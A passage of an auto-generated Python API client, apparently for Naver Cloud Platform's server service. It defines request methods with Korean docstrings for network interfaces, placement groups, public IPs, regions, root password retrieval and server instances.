if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_interface_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_network_interface_detail_request' is set
if ('get_network_interface_detail_request' not in params or
params['get_network_interface_detail_request'] is None):
raise ValueError("Missing the required parameter `get_network_interface_detail_request` when calling `get_network_interface_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_network_interface_detail_request' in params:
body_params = params['get_network_interface_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getNetworkInterfaceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetNetworkInterfaceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_interface_list(self, get_network_interface_list_request, **kwargs): # noqa: E501
"""get_network_interface_list # noqa: E501
네트워크인터페이스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_list(get_network_interface_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceListRequest get_network_interface_list_request: getNetworkInterfaceListRequest (required)
:return: GetNetworkInterfaceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_network_interface_list_with_http_info(get_network_interface_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_network_interface_list_with_http_info(get_network_interface_list_request, **kwargs) # noqa: E501
return data
def get_network_interface_list_with_http_info(self, get_network_interface_list_request, **kwargs): # noqa: E501
"""get_network_interface_list # noqa: E501
네트워크인터페이스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_list_with_http_info(get_network_interface_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceListRequest get_network_interface_list_request: getNetworkInterfaceListRequest (required)
:return: GetNetworkInterfaceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_network_interface_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_interface_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_network_interface_list_request' is set
if ('get_network_interface_list_request' not in params or
params['get_network_interface_list_request'] is None):
raise ValueError("Missing the required parameter `get_network_interface_list_request` when calling `get_network_interface_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_network_interface_list_request' in params:
body_params = params['get_network_interface_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getNetworkInterfaceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetNetworkInterfaceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_placement_group_detail(self, get_placement_group_detail_request, **kwargs): # noqa: E501
"""get_placement_group_detail # noqa: E501
물리배치그룹상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_detail(get_placement_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupDetailRequest get_placement_group_detail_request: getPlacementGroupDetailRequest (required)
:return: GetPlacementGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_placement_group_detail_with_http_info(get_placement_group_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_placement_group_detail_with_http_info(get_placement_group_detail_request, **kwargs) # noqa: E501
return data
def get_placement_group_detail_with_http_info(self, get_placement_group_detail_request, **kwargs): # noqa: E501
"""get_placement_group_detail # noqa: E501
물리배치그룹상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_detail_with_http_info(get_placement_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupDetailRequest get_placement_group_detail_request: getPlacementGroupDetailRequest (required)
:return: GetPlacementGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_placement_group_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_placement_group_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_placement_group_detail_request' is set
if ('get_placement_group_detail_request' not in params or
params['get_placement_group_detail_request'] is None):
raise ValueError("Missing the required parameter `get_placement_group_detail_request` when calling `get_placement_group_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_placement_group_detail_request' in params:
body_params = params['get_placement_group_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPlacementGroupDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPlacementGroupDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_placement_group_list(self, get_placement_group_list_request, **kwargs): # noqa: E501
"""get_placement_group_list # noqa: E501
물리배치그룹리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_list(get_placement_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupListRequest get_placement_group_list_request: getPlacementGroupListRequest (required)
:return: GetPlacementGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_placement_group_list_with_http_info(get_placement_group_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_placement_group_list_with_http_info(get_placement_group_list_request, **kwargs) # noqa: E501
return data
def get_placement_group_list_with_http_info(self, get_placement_group_list_request, **kwargs): # noqa: E501
"""get_placement_group_list # noqa: E501
물리배치그룹리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_placement_group_list_with_http_info(get_placement_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPlacementGroupListRequest get_placement_group_list_request: getPlacementGroupListRequest (required)
:return: GetPlacementGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_placement_group_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_placement_group_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_placement_group_list_request' is set
if ('get_placement_group_list_request' not in params or
params['get_placement_group_list_request'] is None):
raise ValueError("Missing the required parameter `get_placement_group_list_request` when calling `get_placement_group_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_placement_group_list_request' in params:
body_params = params['get_placement_group_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPlacementGroupList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPlacementGroupListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_instance_detail(self, get_public_ip_instance_detail_request, **kwargs): # noqa: E501
"""get_public_ip_instance_detail # noqa: E501
공인IP인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_detail(get_public_ip_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceDetailRequest get_public_ip_instance_detail_request: getPublicIpInstanceDetailRequest (required)
:return: GetPublicIpInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, **kwargs) # noqa: E501
return data
def get_public_ip_instance_detail_with_http_info(self, get_public_ip_instance_detail_request, **kwargs): # noqa: E501
"""get_public_ip_instance_detail # noqa: E501
공인IP인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_detail_with_http_info(get_public_ip_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceDetailRequest get_public_ip_instance_detail_request: getPublicIpInstanceDetailRequest (required)
:return: GetPublicIpInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_instance_detail_request' is set
if ('get_public_ip_instance_detail_request' not in params or
params['get_public_ip_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_instance_detail_request` when calling `get_public_ip_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_instance_detail_request' in params:
body_params = params['get_public_ip_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_instance_list(self, get_public_ip_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_instance_list # noqa: E501
공인IP인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_list(get_public_ip_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceListRequest get_public_ip_instance_list_request: getPublicIpInstanceListRequest (required)
:return: GetPublicIpInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, **kwargs) # noqa: E501
return data
def get_public_ip_instance_list_with_http_info(self, get_public_ip_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_instance_list # noqa: E501
공인IP인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_instance_list_with_http_info(get_public_ip_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpInstanceListRequest get_public_ip_instance_list_request: getPublicIpInstanceListRequest (required)
:return: GetPublicIpInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_instance_list_request' is set
if ('get_public_ip_instance_list_request' not in params or
params['get_public_ip_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_instance_list_request` when calling `get_public_ip_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_instance_list_request' in params:
body_params = params['get_public_ip_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_public_ip_target_server_instance_list(self, get_public_ip_target_server_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_target_server_instance_list # noqa: E501
공인IP할당가능서버인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_target_server_instance_list(get_public_ip_target_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpTargetServerInstanceListRequest get_public_ip_target_server_instance_list_request: getPublicIpTargetServerInstanceListRequest (required)
:return: GetPublicIpTargetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_public_ip_target_server_instance_list_with_http_info(self, get_public_ip_target_server_instance_list_request, **kwargs): # noqa: E501
"""get_public_ip_target_server_instance_list # noqa: E501
공인IP할당가능서버인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_public_ip_target_server_instance_list_with_http_info(get_public_ip_target_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetPublicIpTargetServerInstanceListRequest get_public_ip_target_server_instance_list_request: getPublicIpTargetServerInstanceListRequest (required)
:return: GetPublicIpTargetServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_public_ip_target_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_public_ip_target_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_public_ip_target_server_instance_list_request' is set
if ('get_public_ip_target_server_instance_list_request' not in params or
params['get_public_ip_target_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_public_ip_target_server_instance_list_request` when calling `get_public_ip_target_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_public_ip_target_server_instance_list_request' in params:
body_params = params['get_public_ip_target_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getPublicIpTargetServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetPublicIpTargetServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_region_list(self, get_region_list_request, **kwargs): # noqa: E501
"""get_region_list # noqa: E501
REGION리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_region_list(get_region_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRegionListRequest get_region_list_request: getRegionListRequest (required)
:return: GetRegionListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_region_list_with_http_info(get_region_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_region_list_with_http_info(get_region_list_request, **kwargs) # noqa: E501
return data
def get_region_list_with_http_info(self, get_region_list_request, **kwargs): # noqa: E501
"""get_region_list # noqa: E501
REGION리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_region_list_with_http_info(get_region_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRegionListRequest get_region_list_request: getRegionListRequest (required)
:return: GetRegionListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_region_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_region_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_region_list_request' is set
if ('get_region_list_request' not in params or
params['get_region_list_request'] is None):
raise ValueError("Missing the required parameter `get_region_list_request` when calling `get_region_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_region_list_request' in params:
body_params = params['get_region_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRegionList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRegionListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_root_password(self, get_root_password_request, **kwargs): # noqa: E501
"""get_root_password # noqa: E501
서버인스턴스의루트패스워드조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password(get_root_password_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordRequest get_root_password_request: getRootPasswordRequest (required)
:return: GetRootPasswordResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_root_password_with_http_info(get_root_password_request, **kwargs) # noqa: E501
else:
(data) = self.get_root_password_with_http_info(get_root_password_request, **kwargs) # noqa: E501
return data
def get_root_password_with_http_info(self, get_root_password_request, **kwargs): # noqa: E501
"""get_root_password # noqa: E501
서버인스턴스의루트패스워드조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_with_http_info(get_root_password_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordRequest get_root_password_request: getRootPasswordRequest (required)
:return: GetRootPasswordResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_root_password_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_root_password_request' is set
if ('get_root_password_request' not in params or
params['get_root_password_request'] is None):
raise ValueError("Missing the required parameter `get_root_password_request` when calling `get_root_password`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_root_password_request' in params:
body_params = params['get_root_password_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRootPassword', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRootPasswordResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_root_password_server_instance_list(self, get_root_password_server_instance_list_request, **kwargs): # noqa: E501
"""get_root_password_server_instance_list # noqa: E501
서버인스턴스리스트의루트패스워드조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_server_instance_list(get_root_password_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordServerInstanceListRequest get_root_password_server_instance_list_request: getRootPasswordServerInstanceListRequest (required)
:return: GetRootPasswordServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, **kwargs) # noqa: E501
return data
def get_root_password_server_instance_list_with_http_info(self, get_root_password_server_instance_list_request, **kwargs): # noqa: E501
"""get_root_password_server_instance_list # noqa: E501
서버인스턴스리스트의루트패스워드조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_root_password_server_instance_list_with_http_info(get_root_password_server_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetRootPasswordServerInstanceListRequest get_root_password_server_instance_list_request: getRootPasswordServerInstanceListRequest (required)
:return: GetRootPasswordServerInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_root_password_server_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root_password_server_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_root_password_server_instance_list_request' is set
if ('get_root_password_server_instance_list_request' not in params or
params['get_root_password_server_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_root_password_server_instance_list_request` when calling `get_root_password_server_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_root_password_server_instance_list_request' in params:
body_params = params['get_root_password_server_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getRootPasswordServerInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetRootPasswordServerInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_image_product_list(self, get_server_image_product_list_request, **kwargs): # noqa: E501
"""get_server_image_product_list # noqa: E501
서버이미지상품리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_image_product_list(get_server_image_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerImageProductListRequest get_server_image_product_list_request: getServerImageProductListRequest (required)
:return: GetServerImageProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_image_product_list_with_http_info(get_server_image_product_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_image_product_list_with_http_info(get_server_image_product_list_request, **kwargs) # noqa: E501
return data
def get_server_image_product_list_with_http_info(self, get_server_image_product_list_request, **kwargs): # noqa: E501
"""get_server_image_product_list # noqa: E501
서버이미지상품리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_image_product_list_with_http_info(get_server_image_product_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerImageProductListRequest get_server_image_product_list_request: getServerImageProductListRequest (required)
:return: GetServerImageProductListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_server_image_product_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_image_product_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_server_image_product_list_request' is set
if ('get_server_image_product_list_request' not in params or
params['get_server_image_product_list_request'] is None):
raise ValueError("Missing the required parameter `get_server_image_product_list_request` when calling `get_server_image_product_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_server_image_product_list_request' in params:
body_params = params['get_server_image_product_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getServerImageProductList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetServerImageProductListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_instance_detail(self, get_server_instance_detail_request, **kwargs): # noqa: E501
"""get_server_instance_detail # noqa: E501
서버인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_detail(get_server_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetServerInstanceDetailRequest get_server_instance_detail_request: getServerInstanceDetailRequest (required)
:return: GetServerInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_server_instance_detail_with_http_info(get_server_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_server_instance_detail_with_http_info(get_server_instance_detail_request, **kwargs) # noqa: E501
return data
def get_server_instance_detail_with_http_info(self, get_server_instance_detail_request, **kwargs): # noqa: E501
"""get_server_instance_detail # noqa: E501
서버인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_server_instance_detail_with_http_info(get_server_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
